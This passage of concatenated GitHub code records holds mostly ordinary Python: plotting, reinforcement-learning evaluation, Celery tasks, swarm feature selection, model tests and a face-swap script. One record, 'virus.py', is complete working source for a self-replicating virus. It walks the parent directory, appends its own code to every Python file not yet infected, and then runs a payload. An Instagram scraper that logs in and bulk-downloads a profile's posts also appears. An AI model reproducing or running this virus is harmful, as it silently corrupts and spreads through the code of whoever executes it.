Minimum: \" + str(temp.min()))\n    )\n\n\ndef avg_duration_per_phase(train_balanced: pd.DataFrame) -> None:\n    phases = train_balanced.phase.unique()\n    print(phases)\n    temp = train_balanced.groupby([\"process_id\", \"phase\"]).size()\n    # groupby().size() returns a Series; reset_index() builds the DataFrame\n    temp = temp.reset_index()\n    g = sns.FacetGrid(temp[temp[0] < 1000], col=\"phase\", col_order=phases, size=10)\n    g = g.map(plt.hist, 0, bins=100)\n\n\ndef viz_columns(train_balanced):\n    cols = [\"supply_pump\", \"supply_pre_rinse\", \"supply_caustic\", \"return_caustic\", \"supply_acid\",\n            \"return_acid\", \"supply_clean_water\", \"return_recovery_water\", \"object_low_level\"]\n    for col in cols:\n        sns.countplot(data=train_balanced, hue=\"phase\", x=col)\n        plt.show()\n","repo_name":"JeremyLG/RinseOverRun","sub_path":"src/dataViz/dataViz.py","file_name":"dataViz.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74154150506","text":"import os\n\nos.environ[\"XLA_PYTHON_CLIENT_MEM_FRACTION\"] = \".2\"\n\nimport time\n\nimport d4rl\nimport gym\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom models import TD3BCAgent\n\n\ndef eval_policy(agent,\n                eval_env,\n                obs_mean: np.ndarray = 0.0,\n                obs_std: np.ndarray = 1.0,\n                eval_episodes: int = 10):\n    t1 = time.time()\n    avg_reward = 0.\n    for _ in range(eval_episodes):\n        obs, done = eval_env.reset(), False\n        while not done:\n            obs = (obs - obs_mean)/obs_std\n            action = agent.sample_action(obs)\n            obs, reward, done, _ = eval_env.step(action)\n            avg_reward += reward\n    avg_reward /= eval_episodes\n    d4rl_score = eval_env.get_normalized_score(avg_reward) * 100\n    return d4rl_score, time.time() - t1\n\n\nmujoco_envs = [\n    \"halfcheetah-random-v2\",\n    \"halfcheetah-medium-v2\",\n    \"halfcheetah-medium-replay-v2\",\n    \"hopper-random-v2\",\n    \"hopper-medium-v2\",\n    \"hopper-medium-replay-v2\",\n    \"walker2d-random-v2\",\n    \"walker2d-medium-v2\",\n    \"walker2d-medium-replay-v2\",\n]\n\nantmaze_envs = [\n    \"antmaze-umaze-v0\",\n    \"antmaze-umaze-diverse-v0\",\n    \"antmaze-medium-play-v0\",\n    \"antmaze-medium-diverse-v0\",\n    \"antmaze-large-play-v0\",\n    \"antmaze-large-diverse-v0\",\n]\n\n\ndef save_td3bc_stats():\n    td3bc_res = {}\n    for env_name in mujoco_envs:\n        env = gym.make(env_name)\n        ds = d4rl.qlearning_dataset(env)\n        ds_observations = ds[\"observations\"]\n        obs_mean = ds_observations.mean(0)\n        obs_std = ds_observations.std(0) + 1e-3\n        td3bc_res[env_name] = {\"obs_mean\": obs_mean,\n                               \"obs_std\": obs_std}\n    np.save(\"td3bc_obs_stats\", td3bc_res)\n    data = np.load(\"td3bc_obs_stats.npy\", allow_pickle=True)\n\n\nres = []\n# load the per-env observation stats written by save_td3bc_stats()\ntd3bc_res = np.load(\"td3bc_obs_stats.npy\", allow_pickle=True).item()\nfor env_name in tqdm(mujoco_envs):\n    env = gym.make(env_name)\n    obs_dim = env.observation_space.shape[0]\n    act_dim = env.action_space.shape[0]\n    agent = TD3BCAgent(obs_dim, act_dim)\n    obs_mean = td3bc_res[env_name][\"obs_mean\"]\n    obs_std = td3bc_res[env_name][\"obs_std\"]\n    agent.load(f\"saved_ckpts/{env_name}\", 200)\n    score, _ = eval_policy(agent, env, obs_mean, obs_std)\n    res.append((env_name, score))\n","repo_name":"fuyw/jrlzoo","sub_path":"td3bc/check_ckpts.py","file_name":"check_ckpts.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"71209650987","text":"import multiprocessing\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom experiments.diversity import dist_plots\nfrom experiments.diversity.measure_samples import 
METRICS_ROOT\n\nCHECKPOINT_ROOT = \"/data/morphomnist/checkpoints\"\nFIGURE_ROOT = \"/vol/biomedic/users/dc315/morphomnist/fig\"\n\n\ndef main(metrics, figure_path=None):\n    # cols = ['length', 'thickness', 'slant', 'aspect']\n    # lims = [(10, 70), (0, 7), (-45, 45), (0, 2.5)]\n    cols = ['length', 'thickness', 'slant', 'width', 'height']\n    lims = [(10, 70), (0, 7), (-45, 45), (0, 22), (8, 22)]\n    multiples = {'length': 20, 'thickness': 2, 'slant': 30, 'width': 10, 'height': 5, 'aspect': .5}\n    formats = {'slant': \"%d\\u00b0\", 'aspect': \"%g\"}\n    metrics['slant'] = np.rad2deg(metrics['slant'])\n\n    dist_plots.plot_distribution(metrics, cols, lims, multiples, formats)\n    if figure_path is not None:\n        fig_kwargs = dict(dpi=400, bbox_inches='tight', pad_inches=0)\n        print(f\"Saving figure to {figure_path}\")\n        plt.savefig(figure_path, **fig_kwargs)\n    plt.show()\n\n\nif __name__ == '__main__':\n    os.makedirs(FIGURE_ROOT, exist_ok=True)\n    dataset_dir = \"/vol/biomedic/users/dc315/mnist/plain\"\n    test_metrics = pd.read_csv(os.path.join(dataset_dir, \"t10k-morpho.csv\"))\n    figure_path = os.path.join(FIGURE_ROOT, \"test_plain_morpho_dist.pdf\")\n\n    specs = [\n        \"VAE-64_plain\",\n        \"GAN-64_plain\",\n        \"GAN-2_plain\",\n    ]\n\n    pool = multiprocessing.Pool()\n    pool.apply_async(main, (test_metrics, figure_path))\n    for spec in specs:\n        sample_metrics = pd.read_csv(os.path.join(METRICS_ROOT, f\"{spec}_metrics.csv\"))\n        figure_path = os.path.join(FIGURE_ROOT, f\"{spec}_morpho_dist.pdf\")\n        pool.apply_async(main, (sample_metrics, figure_path))\n    pool.close()\n    pool.join()\n","repo_name":"dccastro/Morpho-MNIST","sub_path":"experiments/diversity/plot_dists.py","file_name":"plot_dists.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"37"} +{"seq_id":"26884194535","text":"import time\ntimestamp = time.strftime(\"%H:%M:%S\")\n# print(type(timestamp))\nprint(timestamp)\nhour = int(time.strftime(\"%H\"))\nif(hour<12):\n    print(\"Good Morning\")\nelif(hour<18):\n    print(\"Good Afternoon\")\nelse:\n    print(\"Good Night\")","repo_name":"tanvirahmed1732/Practice","sub_path":"Python Practice/time_wishing.py","file_name":"time_wishing.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29568771403","text":"from celery import task\nfrom celery.task.control import inspect # for inspectTasks\nimport time\nfrom ..config import clog\nfrom .tbase import getBaseP, getBaseC, getLine\nfrom ..models import mcomment\nfrom ..models import msubreddit\nfrom ..models import mthread\nfrom ..models import muser\n# import pprint\n\n# --------------------------------------------------------------------------\n@task()\ndef TASK_template():\n    mi = clog.dumpMethodInfo()\n    ts = time.time()\n\n    # # create PRAW prawReddit instance\n    # prawReddit = mcomment.getPrawRedditInstance()\n\n    clog.logger.info(\"%s\" % (getBaseP(mi)))\n\n    clog.logger.info(\"%s\" % (getBaseC(mi, ts)))\n    return \"\"\n\n# --------------------------------------------------------------------------\nheartbeatTickString = \"TICK\"\n@task()\ndef TASK_inspectTaskQueue():\n    mi = clog.dumpMethodInfo()\n    ts = time.time()\n\n    thisTaskName = 'reddit.tasks.tmisc.TASK_inspectTaskQueue'\n    workerName = \"celery@datagrab\"\n\n    i = inspect()\n\n    # clog.logger.info(\"scheduled: %s\" % (pprint.pformat(i.scheduled())))\n    # clog.logger.info(\"active: %s\" % (pprint.pformat(i.active())))\n    # clog.logger.info(\"reserved: 
%s\" % (pprint.pformat(i.reserved())))\n\n # Scheduled Tasks\n scheduledCount = 0\n scheduled = i.scheduled()\n if len(scheduled) > 0 and workerName in scheduled:\n scheduledList = scheduled[workerName]\n for item in scheduledList:\n if item['name'] != thisTaskName: # Ignore THIS task\n scheduledCount += 1\n\n # Active Tasks\n activeCount = 0\n active = i.active()\n if len(active) > 0 and workerName in active:\n activeList = active[workerName]\n for item in activeList:\n if item['name'] != thisTaskName: # Ignore THIS task\n activeCount += 1\n\n # Reserved Tasks\n reservedCount = 0\n reserved = i.reserved()\n if len(reserved) > 0 and workerName in reserved:\n reservedList = reserved[workerName]\n for item in reservedList:\n if item['name'] != thisTaskName: # Ignore THIS task\n reservedCount += 1\n\n global heartbeatTickString\n if heartbeatTickString == 'TICK': heartbeatTickString = 'tock'\n else: heartbeatTickString = 'TICK'\n\n if scheduledCount or activeCount or reservedCount:\n clog.logger.info(\"%s %s: %d active, %d scheduled, %d reserved\" % (getBaseC(mi, ts), heartbeatTickString, activeCount, scheduledCount, reservedCount))\n else:\n clog.logger.info(\"%s %s: %s\" % (getBaseC(mi, ts), heartbeatTickString, \"*** no pending tasks ***\"))\n return \"\"\n\n# --------------------------------------------------------------------------\n@task()\ndef TASK_generateModelCountData():\n mi = clog.dumpMethodInfo()\n\n users_poi = muser.objects.filter(ppoi=True).count()\n users_notPoi = muser.objects.filter(ppoi=False).count()\n\n users_poi_pri_0 = muser.objects.filter(ppoi=True).filter(pprioritylevel=0).count()\n users_poi_pri_1 = muser.objects.filter(ppoi=True).filter(pprioritylevel=1).count()\n users_poi_pri_2 = muser.objects.filter(ppoi=True).filter(pprioritylevel=2).count()\n users_poi_pri_3 = muser.objects.filter(ppoi=True).filter(pprioritylevel=3).count()\n\n comments_usersAdded = mcomment.objects.filter(puseradded=True).count()\n comments_notUsersAdded = mcomment.objects.filter(puseradded=False).count()\n\n subreddits_poi = msubreddit.objects.filter(ppoi=True).count()\n subreddits_notPoi = msubreddit.objects.filter(ppoi=False).count()\n\n subreddits_poi_pri_0 = msubreddit.objects.filter(ppoi=True).filter(pprioritylevel=0).count()\n subreddits_poi_pri_1 = msubreddit.objects.filter(ppoi=True).filter(pprioritylevel=1).count()\n subreddits_poi_pri_2 = msubreddit.objects.filter(ppoi=True).filter(pprioritylevel=2).count()\n subreddits_poi_pri_3 = msubreddit.objects.filter(ppoi=True).filter(pprioritylevel=3).count()\n\n threads_forestGot = mthread.objects.filter(pforestgot=True).count()\n threads_notForestGot = mthread.objects.filter(pforestgot=False).count()\n\n listOfModelCountStrings = []\n\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi\", users_poi))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users !poi\", users_notPoi))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi priority 0\", users_poi_pri_0))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi priority 1\", users_poi_pri_1))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi priority 2\", users_poi_pri_2))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi priority 3\", users_poi_pri_3))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Comments users added\", comments_usersAdded))\n 
listOfModelCountStrings.append(\"%-30s %8d\" % (\"Comments !users added\", comments_notUsersAdded))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Comments total\", comments_usersAdded + comments_notUsersAdded))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi\", subreddits_poi))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits !poi\", subreddits_notPoi))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi priority 0\", subreddits_poi_pri_0))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi priority 1\", subreddits_poi_pri_1))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi priority 2\", subreddits_poi_pri_2))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi priority 3\", subreddits_poi_pri_3))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Threads forestGot\", threads_forestGot))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Threads !forestGot\", threads_notForestGot))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Threads total\", threads_forestGot + threads_notForestGot))\n\n return listOfModelCountStrings\n\n# --------------------------------------------------------------------------\n@task()\ndef TASK_displayModelCounts():\n mi = clog.dumpMethodInfo()\n ts = time.time()\n\n listOfModelCountStrings = TASK_generateModelCountData()\n\n clog.logger.info(\"%s %s\" % (getBaseC(mi, ts), getLine()))\n for line in listOfModelCountStrings:\n # clog.logger.info(\"%s * %s *\" % (getBaseC(mi, ts), line))\n clog.logger.info(\"%s %s \" % (getBaseC(mi, ts), line))\n clog.logger.info(\"%s %s\" % (getBaseC(mi, ts), getLine()))\n return\n","repo_name":"VestedSkeptic/datagrab","sub_path":"reddit/tasks/tmisc.py","file_name":"tmisc.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30279219324","text":"import math\nimport numpy as np\nimport pyswarms as ps\nimport random\nimport sys\nfrom scipy.spatial import distance as dist\n\n\nfrom EvaluateMask import EvaluateMask\nfrom LoadFeatures import LoadFeatures\n\n\nif len(sys.argv) != 4:\n\tprint(\"Missing parameters\")\n\tprint(\"FORMAT: algorithm data_set ones_ratio run\")\n\texit()\n\nalgorithm = sys.argv[0].split(\".\")[0]\ndata_set = sys.argv[1]\nones_ratio = float(sys.argv[2])\nrun_no = int(sys.argv[3])\nall_features_file_name = \"../Concatenator/\"+data_set+\"/AllFeatures.txt\"\nout_file_name = \"output/\"+algorithm+\"-\"+data_set+\"-\"+str(ones_ratio)+\"-\"+str(run_no)\n\nPopSize = 100\nNIter = int(15000/PopSize)\nUseDiscrete = True\nDecayRate = 0.15\nFitnessWeight = 0.7\nStepSize = 0.1\nFeatureWeight = 0.0\n\nclass Worm:\n\tdef __init__(self, n_dim):\n\t\tself.location = np.random.uniform(low=0, high=1, size=n_dim)\n\t\tself.luciferin = 0.5\n\t\tself.radius = math.sqrt(n_dim)\n\n\n\tdef update_luciferin(self, x, y):\n\t\tif UseDiscrete:\n\t\t\tmask = [0 if _ < 0.5 else 1 for _ in self.location]\n\t\telse:\n\t\t\tmask = self.location\n\t\tself.luciferin = (self.luciferin * (1.0 - DecayRate)) + (FitnessWeight * EvaluateMask(mask, x, y, feature_weight = FeatureWeight))\n\n\tdef update_position(self, other):\n\t\tdelta = np.array(other.location) - 
np.array(self.location)\n\t\tmove = StepSize * delta/math.sqrt(np.sum(delta ** 2.0))\n\t\tself.location = np.array(self.location) + move\n\ndef CreatePopulation(pop_size, n_dim):\n\tpop = []\n\tfor _ in range(pop_size):\n\t\tpop.append(Worm(n_dim))\n\treturn pop\n\ndef UpdateLuciferinLevels(pop, x, y):\n\tfor worm in pop:\n\t\tworm.update_luciferin(x,y)\n\ndef GetNeighbors(worm, pop):\n\tneighbors = []\n\tfor w in pop:\n\t\tif (dist.euclidean(worm.location, w.location) < worm.radius) and (worm.luciferin < w.luciferin):\n\t\t\tneighbors.append(w)\n\treturn neighbors\n\ndef SelectNeighbor(worm, neighbors):\n\tdeltas = []\n\tsum = 0.0\n\tfor w in neighbors:\n\t\tdelta = w.luciferin - worm.luciferin\n\t\tdeltas.append(delta)\n\t\tsum += delta\n\tweights = np.array(deltas)/sum\n\treturn random.choices(neighbors, weights)[0]\n\t\t\n\ndef UpdatePositions(pop):\n\tfor worm in pop:\n\t\tneighbors = GetNeighbors(worm, pop)\n\t\tif len(neighbors) > 0:\n\t\t\tneighbor = SelectNeighbor(worm, neighbors)\n\t\t\tworm.update_position(neighbor)\n\ndef UpdateSensorRadius(pop):\n\tpass\n\ndef BestFit(pop, x, y):\n\treturn max(pop, key=lambda worm: EvaluateMask(worm.location, x, y, feature_weight = FeatureWeight))\n\ndef SwarmMask(x, y):\n\n\t# Input: array of shape (pop_size, features)\n\t# Output: fitness values of shape (pop_size)\n\n\tpop = CreatePopulation(PopSize, len(x[0]))\n\tfor _ in range(NIter):\n\t\t#print('loop = '+str(_))\n\t\tUpdateLuciferinLevels(pop, x, y)\n\t\tUpdatePositions(pop)\n\t\tUpdateSensorRadius(pop)\n\n\tloc = BestFit(pop, x, y).location\n\tif UseDiscrete:\n\t\tmask = [0 if _ < 0.5 else 1 for _ in loc]\n\telse:\n\t\tmask = loc\n\treturn mask\n\nx, y = LoadFeatures(all_features_file_name)\n\nFeatureWeight = ones_ratio\nmask = SwarmMask(x, y)\n\naccuracy = EvaluateMask(mask, x, y, feature_weight=0)\n\nwith open(out_file_name, 'w') as out_file:\n\tout_file.write(str(accuracy)+\",\"+str(mask)+\"\\n\")\n","repo_name":"shallada/SwarmAttribution","sub_path":"FeatureSelectors/GlowwormSwarmOptimization.py","file_name":"GlowwormSwarmOptimization.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28788117356","text":"from selenium import webdriver\nfrom time import sleep\nimport urllib.request\n\ndriver = webdriver.Chrome()\n\ndriver.get('https://www.instagram.com/')\nsleep(2)\n\nlogin_link = driver.find_element_by_xpath(\"//*[@id='loginForm']\")\nlogin_link.click()\n\nsleep(2)\n\nusername_input = driver.find_element_by_css_selector(\"input[name='username']\")\npassword_input = driver.find_element_by_css_selector(\"input[name='password']\")\n\nusername_input.send_keys(\"USERNAME\")\npassword_input.send_keys(\"PASSWORD\")\n\nlogin_button = driver.find_element_by_xpath(\"//button[@type='submit']\")\nlogin_button.click()\n\nsleep(3)\ndriver.get(\"https://instagram.com/funnywhimsical/\")\n#Scroll to Last\nlenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\nmatch = False\nwhile(match==False):\n lastCount = lenOfPage\n sleep(3)\n lenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\n if lastCount == lenOfPage:\n match=True\n\nposts = []\nlinks = driver.find_elements_by_tag_name('a')\nfor link in links:\n post = link.get_attribute('href')\n if '/p/' in post:\n posts.append(post)\n\nprint(posts)\n\ndownload_url = 
''\nfor post in posts:\n    driver.get(post)\n    sleep(2)\n    url = driver.current_url\n    shortcode = url.split(\"/\")[-2]\n    # grab an image source from the post page; retrieving `url` itself would\n    # only save the post's HTML document under a .jpg name\n    download_url = driver.find_element_by_tag_name('img').get_attribute('src')\n    urllib.request.urlretrieve(download_url, \"{}.jpg\".format(shortcode))\n\n    print( download_url )\n\ndriver.close()","repo_name":"Abs7992/instaScrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71295602346","text":"import math\r\nimport pathlib\r\nimport joblib\r\nimport numpy as np\r\n\r\n\r\n# Access path where dataset is stored\r\nPATH = pathlib.Path(pathlib.Path(__file__).parent.resolve()).parent.resolve()\r\ndirectory = str(PATH) + r'\\data\\python_data'\r\nV_rescaled_path = directory + r'\\V_rescaled.joblib' \r\nI_rescaled_path = directory + r'\\I_rescaled.joblib'\r\nI_rescaled_noDC_path = directory+r'\\Ι_rescaled_noDC.joblib'\r\nV_rescaled_noDC_path = directory+r'\\V_rescaled_noDC.joblib'\r\n\r\nV_rescaled = joblib.load(V_rescaled_path)\r\n#I_rescaled = joblib.load(I_rescaled_path)\r\n#V_rescaled_noDC = joblib.load(V_rescaled_noDC_path)\r\n\r\nfor idx in range(V_rescaled.shape[0]):\r\n    for branch in range(V_rescaled.shape[1]):\r\n        for meter in range(V_rescaled.shape[3]):\r\n            dc = V_rescaled[idx,branch,0,meter]\r\n            for time in range(V_rescaled.shape[2]):\r\n                V_rescaled[idx,branch,time,meter] = abs(V_rescaled[idx,branch,time,meter] - dc)\r\n            \r\njoblib.dump(V_rescaled, V_rescaled_noDC_path)\r\n\r\n#%%\r\n\r\n#V_rescaled = joblib.load(V_rescaled_path)\r\nI_rescaled = joblib.load(I_rescaled_path)\r\n#V_rescaled_noDC = joblib.load(V_rescaled_noDC_path)\r\n\r\nfor idx in range(I_rescaled.shape[0]):\r\n    for meter in range(I_rescaled.shape[2]):\r\n        dc = I_rescaled[idx,0,meter]\r\n        for time in range(I_rescaled.shape[1]):\r\n            I_rescaled[idx,time,meter] = abs(I_rescaled[idx,time,meter] - dc)\r\n        \r\njoblib.dump(I_rescaled, I_rescaled_noDC_path)","repo_name":"bRizeakos/Fault-Location-Identification-Classification-in-LV-grids","sub_path":"remove_dc.py","file_name":"remove_dc.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"28976196618","text":"import numpy as np\n\nfrom efficientroutes import model\n\neps = 1e-15\n\ndef test_Bicyclist():\n    mass = 84.0\n    Cd = 1.16\n    W_max = 120\n    A = 0.56\n    bicyclist = model.Bicyclist(mass=mass, dragCoefficient=Cd,\n            frontalArea=A, maxPower=W_max, ridingStyle='casual')\n\n    assert (bicyclist.mass - mass) < eps\n    assert (bicyclist.dragCoefficient - Cd) < eps\n    assert (bicyclist.frontalArea - A) < eps\n    assert (bicyclist.maxPower - W_max) < eps\n    assert bicyclist.ridingStyle == 'casual'\n\n    g = 9.81\n    assert (bicyclist.weight() - mass * g) < eps\n\n    speed = 5.0\n    rho = 1.2\n    angle = 0.1\n    drag = -np.sign(speed) * rho * speed**2 / 2.0 * Cd * A\n    assert (bicyclist.aero_drag(rho, speed) - drag) < eps\n    assert (bicyclist.normal_force(angle) - (mass * g) * np.cos(angle)) < eps\n    assert (bicyclist.incline_force(angle) + (mass * g) * np.sin(angle)) < eps\n    Cr = 0.008\n    assert (bicyclist.rolling_friction(Cr, speed, angle) - (-np.sign(speed) *\n        Cr * (mass * g) * np.cos(angle) * (1.0 - np.exp(-speed / 10.0)))) < eps\n    Ca = 0.17\n    assert (bicyclist.max_brake_force(Ca, angle) - Ca * mass * g *\n            np.cos(angle)) < eps\n    assert (bicyclist.max_propulsion(speed, Ca, angle) - min(W_max / speed, Ca\n        * mass * g * np.cos(angle))) < eps\n\ndef test_Route():\n    x = np.linspace(0.0, 100.0, num=100)\n    z = np.sin(x)\n    l = np.hstack((5.0 * 
np.ones_like(x[:50]), 10.0 * np.ones_like(x[50:])))\n    s = np.array([45.0, 67.8, 92.0])\n    route = model.Route(x, z, l, s)\n\n    assert (route.current_speed_limit(30.0) - 5.0) < eps\n    assert (route.current_speed_limit(60.0) - 10.0) < eps\n\n    ns = route.next_stop(15.0)\n    assert (ns - 45.0) < eps\n    dts = route.distance_to_stop(15.0)\n    assert (dts - 30.0) < eps\n\n    ns = route.next_stop(50.0)\n    assert (ns - 67.8) < eps\n    dts = route.distance_to_stop(50.0)\n    assert (dts - 17.8) < eps\n\n    ns = route.next_stop(70.0)\n    assert (ns - 92.0) < eps\n    dts = route.distance_to_stop(70.0)\n    assert (dts - 22.0) < eps\n\n    ns = route.next_stop(95.0)\n    assert ns is None\n    dts = route.distance_to_stop(95.0)\n    assert dts is None\n","repo_name":"moorepants/EfficientRoutes","sub_path":"efficientroutes/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"75114594346","text":"import torch\nfrom torch.utils.data import DataLoader, SequentialSampler\nfrom torchvision import datasets, transforms\nfrom tqdm import tqdm\nimport numpy as np\nimport os\nfrom torchvision.utils import save_image\n\nfrom PIL import Image\nfrom face_shifter import face_shifter_batch\n\n\ndef fixed_image_standardization(image_tensor):\n    processed_tensor = (image_tensor - 127.5) / 128.0\n    return processed_tensor\n\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\ndef main():\n    data_dir = '/mnt/Data8T/lyyang/LFW_align_crop_224'\n    targ_img_path = '/home/lyyang/papercode/FRModel/testimg/Ethan_Hawke_0001.jpg'\n    batch_size = 8\n    workers = 0 if os.name == 'nt' else 8\n\n    trans = transforms.Compose([\n        # transforms.Resize(160),\n        np.float32,\n        transforms.ToTensor(),\n        fixed_image_standardization\n    ])\n\n    target_image = trans(Image.open(targ_img_path))\n    target_img = target_image.repeat(batch_size, 1, 1, 1)\n\n    dataset = datasets.ImageFolder(data_dir, transform=trans)\n\n    dataset.samples = [\n        (p, (p, idx))\n        for p, idx in dataset.samples\n    ]\n\n    test_loader = DataLoader(\n        dataset,\n        num_workers=workers,\n        batch_size=batch_size,\n        sampler=SequentialSampler(dataset)\n    )\n\n    with torch.no_grad():\n        batch_idx = 0\n        for batch in tqdm(test_loader):\n            batch_idx += 1\n            source_img, (paths, yb) = batch\n            source_img = source_img.to(device)\n            img_path_orig = f\"/home/lyyang/papercode/FRModel/testimg/lfw/{batch_idx}_org.jpg\"\n            img_path_res = f\"/home/lyyang/papercode/FRModel/testimg/lfw/{batch_idx}_res.jpg\"\n            save_image((source_img + 1.0) / 2.0, img_path_orig, nrow=4)\n            face_shifter_tensor = face_shifter_batch(source_img, target_img)\n            save_image((face_shifter_tensor + 1.0) / 2.0, img_path_res, nrow=4)\n\n\n\nif __name__ == '__main__':\n    # target from before the modification\n    import time\n\n    T1 = time.time()\n    main()\n    T2 = time.time()\n    with open(\"/home/lyyang/papercode/FRModel/testimg/timelog.txt\", \"w\") as f:\n        f.write('Program runtime: %s seconds' % (T2 - T1))\n","repo_name":"fkeufss/PRO-Face","sub_path":"FaceShifter/lfwtest.py","file_name":"lfwtest.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"32516290415","text":"##### VIRUS START #####\nimport sys\nimport threading\nimport os\n\n\ndef copyvirus():\n    # Copy virus code\n    virus_code = []\n    in_virus = False\n    in_payload = False\n\n    with open(sys.argv[0], 'r') as f:\n        for line in f.readlines():\n            if line == \"##### VIRUS START #####\\n\":\n                in_virus = True\n            if 
in_virus:\n                if in_payload:\n                    pass\n                virus_code.append(line)\n            if line == \"##### VIRUS PAYLOAD #####\\n\":\n                in_payload = True\n\n            if line == \"##### VIRUS END #####\\n\":\n                break\n        f.close()\n    return virus_code\n\n\ndef findfiles():\n    # Find python files\n    python_files = []\n    print(\"\\nFiles:\")\n    for root, dirs, files in os.walk(\"..\"):\n        for name in files:\n            if name.endswith(\".py\"):\n                print(os.path.join(root, name))\n                python_files.append(os.path.join(root, name))\n                # print(pathlib.Path(os.path.join(root, name)))\n    return python_files\n\n\ndef infectfiles(python_files, virus_code):\n    # Infect files\n    for file in python_files:\n        infected = False\n        with open(file, 'r') as f:\n            code = f.readlines()\n            f.close()\n        for line in code:\n            if line == \"##### VIRUS START #####\\n\":\n                infected = True\n                break\n        if not infected:\n            new_code = []\n            new_code.extend(code)\n            new_code.append(\"\\n\\n\\n\")\n            new_code.extend(virus_code)\n            with open(file, 'w') as f:\n                f.writelines(new_code)\n                f.close()\n\n\n##### PAYLOAD START #####\n\ndef executepayload():\n    print(\"You've been infected by my virus\")\n\n\n##### PAYLOAD END #####\n\n\ndef main():\n    virus = copyvirus()\n    files = findfiles()\n    infectfiles(files, virus)\n    executepayload()\n\n\nt1 = threading.Thread(target=main)\nt1.start()\n\n##### VIRUS END #####","repo_name":"aLonelySquidNamedBob/Random-Projects","sub_path":"Simple Virus/virus.py","file_name":"virus.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72057338347","text":"#!/usr/bin/env python3\nimport json\nimport os\nimport time\nfrom log import *\nimport platform\nimport datetime\nimport shutil\nimport subprocess\nimport stat\n\n\n# get the current platform name\ndef get_platform():\n    return platform.system().lower()\n\n\n# strip whitespace-only items from a list\ndef list_trim(list1):\n    return [x.strip() for x in list1 if x.strip() != '']\n\n\n# remove unwanted text and strip surrounding whitespace\ndef replace_trim(str, it_var):\n    new_str = it_var.replace(str, '')\n    new_str = new_str.strip()\n    return new_str\n\n\n# chunk size used when splitting work into batches\ndef get_chunk():\n    return 50\n\n\n# determine the type of a variable\ndef typeof(variate):\n    type = None\n    if isinstance(variate, int):\n        type = \"int\"\n    elif isinstance(variate, str):\n        type = \"str\"\n    elif isinstance(variate, float):\n        type = \"float\"\n    elif isinstance(variate, list):\n        type = \"list\"\n    elif isinstance(variate, tuple):\n        type = \"tuple\"\n    elif isinstance(variate, dict):\n        type = \"dict\"\n    elif isinstance(variate, set):\n        type = \"set\"\n    return type\n\n\n# print data and optionally exit\ndef p(data, t=0):\n    print(data)\n    if t == 0:\n        exit()\n\n\n# parse the video info printed by \"you-get -i\"\ndef you_get_i_url_info(strs, type='iqiyi'):\n    if strs.find('[ DEFAULT ] _________________________________') >= 0:\n        strs = strs.split(\"[ DEFAULT ] _________________________________\")[1]\n    get_platform_str = get_platform()\n    if get_platform_str == \"windows\":\n        if len(strs.split(\"\\r\\n\\r\\n\")) > 1:\n            ts_list = strs.split(\"\\r\\n\\r\\n\")\n        else:\n            ts_list = strs.split(\"\\r\\n\")\n    else:\n        ts_list = strs.split(\"\\n\\n\")\n    new_ts_list = {}\n    ts_key_list = {\n        'format': '- format:',\n        'container': 'container:',\n        'video_profile': 'video-profile:',\n        